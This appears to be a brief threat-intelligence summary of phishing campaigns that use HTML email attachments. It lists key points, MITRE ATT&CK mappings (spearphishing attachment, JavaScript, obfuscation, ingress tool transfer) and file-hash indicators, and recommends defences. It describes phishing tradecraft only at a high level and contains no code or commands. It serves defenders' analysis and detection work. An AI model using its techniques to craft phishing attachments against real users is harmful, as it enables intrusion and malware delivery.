HTML attachment phishing leverages HTML-formatted attachments to deliver malware and bypass email defenses. The analysis explains how attackers use these attachments and social engineering to entice users into opening them, enabling payload delivery and initial access.
#HTMLAttachmentPhishing #TrellixResearch
#HTMLAttachmentPhishing #TrellixResearch
Keypoints
- HTML attachments are used in phishing emails to deliver malicious payloads rather than relying on links.
- Attackers often rely on social engineering and spoofed sender cues to persuade victims to open the attachment.
- The attachment content may include embedded scripts or HTML that fetch additional malicious components.
- Payloads can be downloaded from remote servers or executed locally once the attachment is opened.
- Defense recommendations emphasize reducing or blocking HTML attachments, analyzing attachments in sandbox environments, and user education to spot phishing cues.
- The techniques aim to bypass conventional security controls that focus on links or executable attachments.
MITRE Techniques
- [T1566.001] Spearphishing Attachment – HTML attachments used to deliver malicious payloads via email and bypass some defenses. Quote: ‘HTML attachments are used to deliver payloads and bypass security controls.’
- [T1059.007] JavaScript – Embedded JavaScript within the attachment may execute when the file is opened. Quote: ‘Embedded script in the attachment executes automatically when opened.’
- [T1027] Obfuscated/Compressed Files or Information – Payloads are obfuscated or encoded to evade detection. Quote: ‘The payload is obfuscated to bypass security checks.’
- [T1105] Ingress Tool Transfer – The attachment may cause the system to download the actual payload from a remote server. Quote: ‘Payload is downloaded from a remote server after opening the attachment.’
Indicators of Compromise
- [File hash] HTML attachment phishing – d96e5c5dcea235e9c09c0888e599ec65, d24f61d477b1316c6def56884c37e2b8, and 2 more hashes